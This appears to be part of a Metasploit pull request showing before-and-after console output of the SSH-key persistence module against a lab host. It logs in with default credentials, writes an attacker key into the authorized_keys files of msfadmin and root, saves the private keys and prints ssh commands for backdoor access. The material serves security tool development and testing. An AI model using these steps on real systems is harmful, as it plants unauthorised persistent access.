[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH Permissions
[+] Pubkey set to yes
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Authorized Keys File: .ssh/authorized_keys
[*] Found 32 potential user folders
[!] No .ssh folder found for //.ssh, skipping...
[!] No //.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /bin/.ssh, skipping...
[!] No /bin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /dev/.ssh, skipping...
[!] No /dev/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/ftp/.ssh, skipping...
[!] No /home/ftp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/klog/.ssh, skipping...
[!] No /home/klog/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/service/.ssh, skipping...
[!] No /home/service/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/syslog/.ssh, skipping...
[!] No /home/syslog/.ssh/authorized_keys file found, skipping...
[!] No /home/user/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /nonexistent/.ssh, skipping...
[!] No /nonexistent/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/games/.ssh, skipping...
[!] No /usr/games/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/sbin/.ssh, skipping...
[!] No /usr/sbin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/share/tomcat5.5/.ssh, skipping...
[!] No /usr/share/tomcat5.5/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/backups/.ssh, skipping...
[!] No /var/backups/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/bind/.ssh, skipping...
[!] No /var/cache/bind/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/man/.ssh, skipping...
[!] No /var/cache/man/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/gnats/.ssh, skipping...
[!] No /var/lib/gnats/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/libuuid/.ssh, skipping...
[!] No /var/lib/libuuid/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/mysql/.ssh, skipping...
[!] No /var/lib/mysql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/nfs/.ssh, skipping...
[!] No /var/lib/nfs/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/postgresql/.ssh, skipping...
[!] No /var/lib/postgresql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/list/.ssh, skipping...
[!] No /var/list/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/mail/.ssh, skipping...
[!] No /var/mail/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/ircd/.ssh, skipping...
[!] No /var/run/ircd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/proftpd/.ssh, skipping...
[!] No /var/run/proftpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/sshd/.ssh, skipping...
[!] No /var/run/sshd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/lpd/.ssh, skipping...
[!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/news/.ssh, skipping...
[!] No /var/spool/news/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/postfix/.ssh, skipping...
[!] No /var/spool/postfix/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/uucp/.ssh, skipping...
[!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/www/.ssh, skipping...
[!] No /var/www/.ssh/authorized_keys file found, skipping...
[*] Found 32 confirmed user folders
[+] Storing new private key as /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt. Change the permissions to 600 before using it
[*] Adding key to /home/msfadmin/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2750 bytes (octal-encoded), using printf
[+] Persistence installed! Call a shell using 'ssh -i /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt <username>@10.0.0.10'
[+] use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt RHOSTS=10.0.0.10 USERNAME=<username>
[*] Adding key to /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2750 bytes (octal-encoded), using printf
[+] Persistence installed! Call a shell using 'ssh -i /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt <username>@10.0.0.10'
[+] use auxiliary/scanner/ssh/ssh_login
[+]   run KEY_PATH=/home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt RHOSTS=10.0.0.10 USERNAME=<username>
[-] Exploit failed: NoMethodError undefined method `sys' for #<Msf::Sessions::SshCommandShellBind:0x00007faa37333770>

msf exploit(multi/persistence/ssh_key) >
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      0         2      2      3      0

msf exploit(multi/persistence/ssh_key) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/persistence/ssh_key) > vulns

Vulnerabilities
===============

Timestamp                Host       Service  Resource  Name                               References
---------                ----       -------  --------  ----                               ----------
2026-05-27 06:11:20 UTC  10.0.0.10  None     {}        SSH User Code Execution            CVE-1999-0502,ATT&CK-T1021.004
2026-05-27 06:12:16 UTC  10.0.0.10  None     {}        exploit/multi/persistence/ssh_key  ATT&CK-T1098.004,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_keymanagement,U
                                                                                          RL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=gui&pivots=
                                                                                          windows-10,URL-https://stackoverflow.com/a/50502015

msf exploit(multi/persistence/ssh_key) > creds
Credentials
===========

id   host  origin     service  public    private                                          realm  private_type  JtR Format  cracked_password
--   ----  ------     -------  ------    -------                                          -----  ------------  ----------  ----------------
591        10.0.0.10           msfadmin  0c:3f:1b:b2:97:b3:f1:db:16:bf:b8:b3:32:4c:b6:7a         SSH key
592        10.0.0.10           root      0c:3f:1b:b2:97:b3:f1:db:16:bf:b8:b3:32:4c:b6:7a         SSH key

msf exploit(multi/persistence/ssh_key) > lo
[-] Unknown command: lo. Did you mean log? Run the help command for more details.
msf exploit(multi/persistence/ssh_key) > loot

Loot
====

host       service  type             name             content     info                      path
----       -------  ----             ----             -------     ----                      ----
10.0.0.10           id_rsa           ssh_id_rsa       text/plain  OpenSSH Private Key File  /home/kali/.msf4/loot/20260527071254_default_10.0.0.10_id_rsa_961598.txt
10.0.0.10           authorized_keys  authorized_keys  text/plain  SSH Authorized Keys File  /home/kali/.msf4/loot/20260527071259_default_10.0.0.10_authorized_keys_508496.txt
10.0.0.10           authorized_keys  authorized_keys  text/plain  SSH Authorized Keys File  /home/kali/.msf4/loot/20260527071306_default_10.0.0.10_authorized_keys_173818.txt

msf exploit(multi/persistence/ssh_key) >
```



## After

- All testing was done on this branch, with SSH mixin (https://github.com/rapid7/metasploit-framework/pull/21479) and auth_brute_mixin applied (https://github.com/rapid7/metasploit-framework/pull/21396)

```console
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/multi/ssh/sshexec;
run RHOSTS=10.0.0.10 USERNAME=msfadmin PASSWORD=msfadmin TARGET="Interactive SSH" PAYLOAD=generic/ssh/interact -z;
use exploit/multi/persistence/ssh_key;
options'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
[*] SSH session 1 opened (10.0.0.1:39701 -> 10.0.0.10:22) at 2026-05-27 07:08:45 +0100
[*] Session 1 created in the background.
[*] Using configured payload generic/custom

Module options (exploit/multi/persistence/ssh_key):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   CREATESSHFOLDER  false            yes       If no .ssh folder is found, create it for the target user
   PUBKEY                            no        Path to Public Key File to use. (Default: Create a new one)
   SESSION                           yes       The session to run this module on
   SSHD_CONFIG                       no        sshd_config file
   USERNAME                          no        User to add SSH key to (Default: all users on box)


Payload options (generic/custom):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PAYLOADFILE                   no        The file to read the payload from
   PAYLOADSTR                    no        The string to use as a payload

   **DisablePayloadHandler: True   (no handler will be created!)**


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf exploit(multi/persistence/ssh_key) >
```

```console
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf exploit(multi/persistence/ssh_key) > run SESSION=1
[!] SESSION may not be compatible with this module:
[!]  * Unknown session arch
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking SSH permissions
[+] Pubkey set to yes
[+] The target appears to be vulnerable. Likely vulnerable
[!] Payload handler is disabled, the persistence will be installed only.
[*] Determining authorized_keys file
[*] Authorized keys file (relative): .ssh/authorized_keys
[*] Found 32 potential user folders
[!] No .ssh folder found for /.ssh, skipping...
[!] No /.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /bin/.ssh, skipping...
[!] No /bin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /dev/.ssh, skipping...
[!] No /dev/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/ftp/.ssh, skipping...
[!] No /home/ftp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/klog/.ssh, skipping...
[!] No /home/klog/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/service/.ssh, skipping...
[!] No /home/service/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /home/syslog/.ssh, skipping...
[!] No /home/syslog/.ssh/authorized_keys file found, skipping...
[!] No /home/user/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /nonexistent/.ssh, skipping...
[!] No /nonexistent/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/games/.ssh, skipping...
[!] No /usr/games/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/sbin/.ssh, skipping...
[!] No /usr/sbin/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /usr/share/tomcat5.5/.ssh, skipping...
[!] No /usr/share/tomcat5.5/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/backups/.ssh, skipping...
[!] No /var/backups/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/bind/.ssh, skipping...
[!] No /var/cache/bind/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/cache/man/.ssh, skipping...
[!] No /var/cache/man/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/gnats/.ssh, skipping...
[!] No /var/lib/gnats/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/libuuid/.ssh, skipping...
[!] No /var/lib/libuuid/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/mysql/.ssh, skipping...
[!] No /var/lib/mysql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/nfs/.ssh, skipping...
[!] No /var/lib/nfs/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/lib/postgresql/.ssh, skipping...
[!] No /var/lib/postgresql/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/list/.ssh, skipping...
[!] No /var/list/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/mail/.ssh, skipping...
[!] No /var/mail/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/ircd/.ssh, skipping...
[!] No /var/run/ircd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/proftpd/.ssh, skipping...
[!] No /var/run/proftpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/run/sshd/.ssh, skipping...
[!] No /var/run/sshd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/lpd/.ssh, skipping...
[!] No /var/spool/lpd/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/news/.ssh, skipping...
[!] No /var/spool/news/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/postfix/.ssh, skipping...
[!] No /var/spool/postfix/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/spool/uucp/.ssh, skipping...
[!] No /var/spool/uucp/.ssh/authorized_keys file found, skipping...
[!] No .ssh folder found for /var/www/.ssh, skipping...
[!] No /var/www/.ssh/authorized_keys file found, skipping...
[*] Found 32 confirmed user folders
[*] Authorized Keys File: /home/msfadmin/.ssh/authorized_keys
[*] User: msfadmin
[*] Clean-up: Restore /home/msfadmin/.ssh/authorized_keys from local loot: /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.msfa_210696.txt
[*] Adding key to: /home/msfadmin/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2773 bytes (octal-encoded), using printf
[+] Persistence installed!
[*] Storing new private key: /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt. Change the permissions to 600 before using it.
[*]   To get a ssh shell  : $ ssh -i /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt msfadmin@10.0.0.10
[*]   To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=/home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt USERNAME=msfadmin RHOSTS=10.0.0.10'
[*] Authorized Keys File: /root/.ssh/authorized_keys
[*] User: root
[*] Clean-up: Restore /root/.ssh/authorized_keys from local loot: /home/kali/.msf4/loot/20260527070952_default_10.0.0.10_ssh.authkey.root_031955.txt
[*] Adding key to: /root/.ssh/authorized_keys
[*] Max line length is 65537
[*] Writing 725 bytes in 1 chunks of 2773 bytes (octal-encoded), using printf
[+] Persistence installed!
[*] Storing new private key: /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt. Change the permissions to 600 before using it.
[*]   To get a ssh shell  : $ ssh -i /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt root@10.0.0.10
[*]   To get a msf session: $ msfconsole -x 'use auxiliary/scanner/ssh/ssh_login; run KEY_PATH=/home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt USERNAME=root RHOSTS=10.0.0.10'

[*] Clean-up reference file (not directly executable): /home/kali/.msf4/logs/persistence/10.0.0.10_20260527.1004/10.0.0.10_20260527.1004.rc
msf exploit(multi/persistence/ssh_key) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         2      2      4      1

msf exploit(multi/persistence/ssh_key) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10

msf exploit(multi/persistence/ssh_key) > services
Services
========

host       port  proto  name  state  info  resource  parents
----       ----  -----  ----  -----  ----  --------  -------
10.0.0.10  22    tcp    ssh   open         {}

msf exploit(multi/persistence/ssh_key) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                               References
---------                ----       -------       --------  ----                               ----------
2026-05-27 06:08:45 UTC  10.0.0.10  ssh (22/tcp)  {}        SSH User Code Execution            CVE-1999-0502,ATT&CK-T1021.004
2026-05-27 06:09:02 UTC  10.0.0.10  None          {}        exploit/multi/persistence/ssh_key  ATT&CK-T1098.004,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_keymanagem
                                                                                               ent,URL-https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=g
                                                                                               ui&pivots=windows-10,URL-https://stackoverflow.com/a/50502015

msf exploit(multi/persistence/ssh_key) > creds
Credentials
===========

id   host       origin     service       public    private                                          realm  private_type  JtR Format  cracked_password
--   ----       ------     -------       ------    -------                                          -----  ------------  ----------  ----------------
589  10.0.0.10  10.0.0.10  22/tcp (ssh)  msfadmin  94:21:26:63:38:ae:3c:6b:2e:37:3f:a4:dd:48:8f:e3         SSH key
590  10.0.0.10  10.0.0.10  22/tcp (ssh)  root      94:21:26:63:38:ae:3c:6b:2e:37:3f:a4:dd:48:8f:e3         SSH key

msf exploit(multi/persistence/ssh_key) > loot

Loot
====

host       service  type                  name             content     info                                                path
----       -------  ----                  ----             -------     ----                                                ----
10.0.0.10           ssh.authkey.msfadmin  authorized_keys  text/plain  SSH Authorized Keys File (msfadmin)                 /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.msfa_210696.txt
10.0.0.10           ssh.privatekey.rsa    msfadmin_id_rsa  text/plain  SHA256:4ShUnk6Yzj7yDLKEaRYn8LzbqLhzr2H6l2i/CLo70qQ  /home/kali/.msf4/loot/20260527070947_default_10.0.0.10_ssh.privatekey.r_360128.txt
10.0.0.10           ssh.authkey.root      authorized_keys  text/plain  SSH Authorized Keys File (root)                     /home/kali/.msf4/loot/20260527070952_default_10.0.0.10_ssh.authkey.root_031955.txt
10.0.0.10           ssh.privatekey.rsa    root_id_rsa      text/plain  SHA256:4ShUnk6Yzj7yDLKEaRYn8LzbqLhzr2H6l2i/CLo70qQ  /home/kali/.msf4/loot/20260527070954_default_10.0.0.10_ssh.privatekey.r_681133.txt

msf exploit(multi/persistence/ssh_key) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                      Data
 ----                     ----       -------  ----  --------  ----                      ----
 2026-05-27 06:10:04 UTC  10.0.0.10                           host.persistence.cleanup  {:local_id=>1, :stype=>"shell", :desc=>"SSH kali @ ", :platform=>"linux", :via_payload=>"payload/generic/ssh/interact"
                                                                                        , :via_exploit=>"exploit/multi/ssh/sshexec", :created_at=>2026-05-27 06:10:04.909493372 UTC, :commands=>"# Restore /ho
                                                                                        me/msfadmin/.ssh/authorized_keys - local backup: /home/kali/.msf4/loot/20260527070945_default_10.0.0.10_ssh.authkey.ms
                                                                                        fa_210696.txt\n# Restore /root/.ssh/authorized_keys - local backup: /home/kali/.msf4/loot/20260527070952_default_10.0.
                                                                                        0.10_ssh.authkey.root_031955.txt\n"}

msf exploit(multi/persistence/ssh_key) >
```